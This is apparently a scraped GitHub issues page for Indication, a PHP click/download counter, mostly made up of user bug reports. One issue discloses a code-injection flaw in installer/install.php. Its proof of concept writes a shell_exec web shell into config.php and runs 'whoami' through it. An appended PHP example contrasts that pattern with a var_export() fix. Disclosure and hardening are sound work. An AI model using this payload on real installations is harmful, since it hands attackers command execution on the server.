joshf / indication
Indication is a PHP click counter which can also be used as a download counter
License: MIT License
Write a new theme for SHTracker
Hi Josh,
A clean install of Indicator-newest.zip.
Installation: OK
Login: OK
Add link: OK
Count links: not OK
The created link is working, i.e. when clicking on the download,
the 'save as' window opens, select 'save', download is saved.
However, the number (preset to a value of the previously used download counter) stays the same number.
If creating a new download link, it has characters such as "~" or "-" in the URL, it doesn't accept it as a valid input.
Hi Josh,
Yes, the bug is repeatable. I also tried to add a link, which also produced an error in the link id.
That one is just one time tested.
Ok, downloaded the mentioned branch, emptied the database and did a clean install.
Ah! Now the 'Path to script' is correctly entered by the installer.
Click: Install
Installer
Install Complete
Now login: OK
Go to 'Settings': NOT OK
At:
Count Unique Visitors Only
This settings allows you to make sure an individual user's clicks are only counted once
In the field Word after field
"Enabled" Enabled
"Disabled" Disabled";
} else { echo "
"Enabled" Enabled
"Disabled" Disabled"
; } ?>
Time
and
Theme
are OK
Could it be that in version 4 of PHP you used certain words that are reserved words in MySQL 5?
Hope this helps,
Thanks for the quick fix.
We'll get there!
Dirk
According to your readme.md, you released 4.3 before 4.2 and 4.2.1, so, I suppose it's meant to be 5/6 instead of 5/5?
The installer/install.php script contains multiple vulnerabilities that can be exploited by a remote, unauthorized user to gain remote command execution on the server.
The contained vulnerabilities are:
The following proof of concept writes a shell into the config.php:
POST /Indication/installer/install.php HTTP/1.0
doinstall&dbhost=evil.example&dbuser=dummy&dbpassword=dummy&dbname=dummy&adminuser=");echo+shell_exec($_REQUEST[0]."&adminpassword=1
This triggers the installer/install.php script to initialize the Indication table on the MySQL server evil.example while writing the provided parameters into the config.php file on the victim server, overwriting it if it already exists.
Due to an improper encoding of the user provided values during the generation of the PHP code for the config.php, it is possible to inject PHP code into the config.php file (see adminuser parameter) which consequently allows the execution of arbitrary commands by the remote attacker:
GET /Indication/config.php?0=whoami HTTP/1.0
config.php already exists.
var_export when exporting values to PHP code.
Hello Josh,
I found your program a couple of days ago as a test on
an old server with PHP 4.3.10 with Mysql 4.0.23a.
Problemless installation, great program, easy to use!
Then I did a clean install (no database migration!) on
a server with PHP 5.2.9-2 and Mysql 5.1.58
Bug report:
Entered all the fields correctly, but
Installation:
Path to script: this field showed:
I replaced it with http://wyxs.net/links/
and click [Install]
Result: new screen:
Installer: install complete.
Go to login: click: OK
So far everything went well, then:
Click: Settings
Settings opens:
Admin details
Admin user:
Password:
At all other entry fields is visible:
Hope you can fix this.
Kind regards,
If a new URL has upper case chars it automatically converts them to the lower case equivalent, leaving an incorrect URL.
Example:
Store all but database settings in a database table.
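To illustrate the config.php injection described in the installer report above, here is an added PHP example (not Indication's own code): the unsafe string-splicing pattern beside a version that uses var_export() and refuses to overwrite an existing config.php. The function names and the $settings sample are assumptions, not taken from the project.

```php
<?php
// Added example, not Indication's code. Assumed names: write_config_unsafe(),
// write_config_safe(), config_target_is_free(), $settings (constructed input).

// Vulnerable pattern: values are spliced straight into PHP source. A value
// that closes the string literal changes the generated code, not just the data.
function write_config_unsafe(array $settings): string
{
    $php = "<?php\n";
    foreach ($settings as $key => $value) {
        $php .= 'define("' . strtoupper($key) . '", "' . $value . '");' . "\n";
    }
    return $php;
}

// Hardened pattern: var_export() emits a valid PHP string literal for any
// input, escaping quotes and backslashes, so a value can only ever be data.
// Setting names are validated separately because they become constant names.
function write_config_safe(array $settings): string
{
    $php = "<?php\n";
    foreach ($settings as $key => $value) {
        if (!preg_match('/^[a-z_]+$/', $key)) {
            throw new InvalidArgumentException("bad setting name: $key");
        }
        $php .= 'define(' . var_export(strtoupper($key), true) . ', '
              . var_export((string) $value, true) . ");\n";
    }
    return $php;
}

// The installer must also stop once config.php exists; otherwise anyone who
// can reach install.php can replace the live configuration.
function config_target_is_free(string $path): bool
{
    return !file_exists($path);
}

// Constructed sample: a username containing characters that terminate a
// double-quoted PHP string literal.
$settings = ['dbhost' => 'localhost', 'adminuser' => 'alice");'];

echo write_config_unsafe($settings); // ADMINUSER line is no longer a plain string
echo write_config_safe($settings);   // define('ADMINUSER', 'alice");');
var_dump(config_target_is_free(__DIR__ . '/config.php'));
```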